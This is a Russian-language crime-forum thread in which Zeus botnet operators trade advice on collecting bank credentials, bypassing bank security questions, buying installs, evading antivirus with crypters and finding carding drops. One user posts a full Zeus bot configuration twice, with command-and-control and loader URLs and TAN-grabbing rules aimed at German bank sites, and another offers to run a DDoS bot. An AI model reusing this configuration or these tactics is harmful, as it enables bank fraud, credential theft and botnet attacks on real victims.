Zeus (вопросы и ответы)
- Thread starter digix
- Start date
такой вопрос
взял значит ботнет, уже лижит второй день у меня, но бле, даже простой палки на пару баксов нету, ни говоря уже о банк акках
в стате написано
Общая информация
Всего отчетов в базе данных: 308 961
Время первой активности 27.10.2010 10:45:25
Всего ботов: 1 282
Всего активных ботов за 24 часа: 75.82% - 972
Минимальная версия бота: 1.2.10.1
Максимальная версия бота: 1.2.10.1
отчётов 310к, но руками искать так геморно, может кто подкинет бесплатный парсер нормальный
был случай, нашёл данные к банку капоне, зашёл на акк, но попросило ответить на вопросы, не получилось найти в логах ответы, их там вообще возможно найти?
и как улучшить кач-во инсталлов, или это всё зависит от селлера самих инсталлов?
и такой вопрос, есть у кого канторы по каржу разного трафа? пусть даже на палку, главное без сканов! прозвон ещё куда не шло)
взял значит ботнет, уже лижит второй день у меня, но бле, даже простой палки на пару баксов нету, ни говоря уже о банк акках
в стате написано
Общая информация
Всего отчетов в базе данных: 308 961
Время первой активности 27.10.2010 10:45:25
Всего ботов: 1 282
Всего активных ботов за 24 часа: 75.82% - 972
Минимальная версия бота: 1.2.10.1
Максимальная версия бота: 1.2.10.1
отчётов 310к, но руками искать так геморно, может кто подкинет бесплатный парсер нормальный
был случай, нашёл данные к банку капоне, зашёл на акк, но попросило ответить на вопросы, не получилось найти в логах ответы, их там вообще возможно найти?
и как улучшить кач-во инсталлов, или это всё зависит от селлера самих инсталлов?
и такой вопрос, есть у кого канторы по каржу разного трафа? пусть даже на палку, главное без сканов! прозвон ещё куда не шло)
это прежде всего говорит о качестве инсталлов, либо трафика что ты берешь)
самый простой поиск по маске bank ))) бесплатный vs нормальный такого не бывает)
а так стукни в ПМ помогу)
то что у тебя их там нет это говорит лиш о том что у тебя нет инжектов под этот банк)
есть вещи которые позволяют зайти и без этих вопросов) но к сожалению не во все банки это возможно)
Во первых задумайся, все кто продает инсталы не заморачивается на качестве трафика) (по крайней мере огромное множество таких селлеров)
трафик идет не с бизнес, тематики не с развлекухи, а летит все что не поподя.... как ты думаешь дохрена в таком трафе (а вернее в таких инсталах) чего то вкусного?
x_mr_bob_x
Professional
Установил сегодня zeus'a на denwer запустил bot.exe файл отстука нет, это из за того что на виртуалке?
Не факт... Бота сам делал? В билдере уверен что чист? Файл конфига на свой сайт(папка в денвере) положил?
x_mr_bob_x
Professional
Да положил... уверен.. т.к загружал с форума эксплоита он чистый от lexx'a после загрузил с хакера от lexx'a другой версии, бота сделал,положил... может проблема в config'e?
;Build time: 09:48:52 12.08.2009 GMT
;Version: 1.2.7.19
entry "StaticConfig"
;botnet "bot"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://zeus.ru/www/config.bin"
url_compip "http://cmyip.com/" 4096
encryption_key "123321"
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "http://zeus.ru/www/bot.exe"
url_server "http://zeus.ru/www/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://host/cp/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
entry "TANGrabber"
"https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
"https://internetbanking.gad.de/banking/*" "S3C6" "*" "*" "KktNrTanEnz"
"https://www.citibank.de/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
end
entry "DnsMap"
;127.0.0.1 microsoft.com
end
end
---------- Сообщение добавлено 05.12.2010 в 00:09 ---------- Предыдущее сообщение размещено 04.12.2010 в 23:07 ----------
сейчас отстук есть но нет отчетов
;Build time: 09:48:52 12.08.2009 GMT
;Version: 1.2.7.19
entry "StaticConfig"
;botnet "bot"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://zeus.ru/www/config.bin"
url_compip "http://cmyip.com/" 4096
encryption_key "123321"
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "http://zeus.ru/www/bot.exe"
url_server "http://zeus.ru/www/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://host/cp/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
entry "TANGrabber"
"https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
"https://internetbanking.gad.de/banking/*" "S3C6" "*" "*" "KktNrTanEnz"
"https://www.citibank.de/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
end
entry "DnsMap"
;127.0.0.1 microsoft.com
end
end
---------- Сообщение добавлено 05.12.2010 в 00:09 ---------- Предыдущее сообщение размещено 04.12.2010 в 23:07 ----------
сейчас отстук есть но нет отчетов
Если позволите, несколько вопросов.
1.Может я что упустил, но бот прописывается в системной папке как sdra64.exe, тогда вчем проблема для обнаружения его АВ. Или криптором это все лечится?
2.Какая разница между разными панельками 1.2.10.1 / 1.3.2.1 / 1.3.2.1 FreeZS?
3.Инжекты подхватываются ботом с хостинга где лежит панель или прописываются в его тело при билде?
4.Если отдавать команды ботам через создание скрипта в панеле, то это актуально только для ботов с прямыми IP, а для тех что за NAT надо создавать backconect?
5.Файл sockslist.php который должен лежать в корне панели, это самостоятельный файл и подходит от любой панели или есть привязка к панели?
6.Как в файле redir.php создать команду/скрипт чтоб запись отчетов велась в две БД на разных хостах?
Заранее спасибо за ответы )
1.Может я что упустил, но бот прописывается в системной папке как sdra64.exe, тогда вчем проблема для обнаружения его АВ. Или криптором это все лечится?
2.Какая разница между разными панельками 1.2.10.1 / 1.3.2.1 / 1.3.2.1 FreeZS?
3.Инжекты подхватываются ботом с хостинга где лежит панель или прописываются в его тело при билде?
4.Если отдавать команды ботам через создание скрипта в панеле, то это актуально только для ботов с прямыми IP, а для тех что за NAT надо создавать backconect?
5.Файл sockslist.php который должен лежать в корне панели, это самостоятельный файл и подходит от любой панели или есть привязка к панели?
6.Как в файле redir.php создать команду/скрипт чтоб запись отчетов велась в две БД на разных хостах?
Заранее спасибо за ответы )
Last edited:
bosota, отвечу на некоторые вопросы:
Разница между панельками в некоторых доработках в них.
Данные об инжектах подхватываются ботом с хостинга с файла конфига при заражении машины, потом бот уже не обращается к файлу конфига.
Скрипты выполняются всеми ботами, которы за и вне NAT.
Файл sockslist.php никакой привязки не имеет.
Разница между панельками в некоторых доработках в них.
Данные об инжектах подхватываются ботом с хостинга с файла конфига при заражении машины, потом бот уже не обращается к файлу конфига.
Скрипты выполняются всеми ботами, которы за и вне NAT.
Файл sockslist.php никакой привязки не имеет.
vasya_pupkin
RIPPER
Владельцы zeus ботнетов... кому не сложно заинсталить мой ddos бот на хрюши? если все ок будет, то буду ддосить нужное вам по просьбе 
хм... а сколько 1000 инсталов стоят?
хм... а сколько 1000 инсталов стоят?
Similar threads
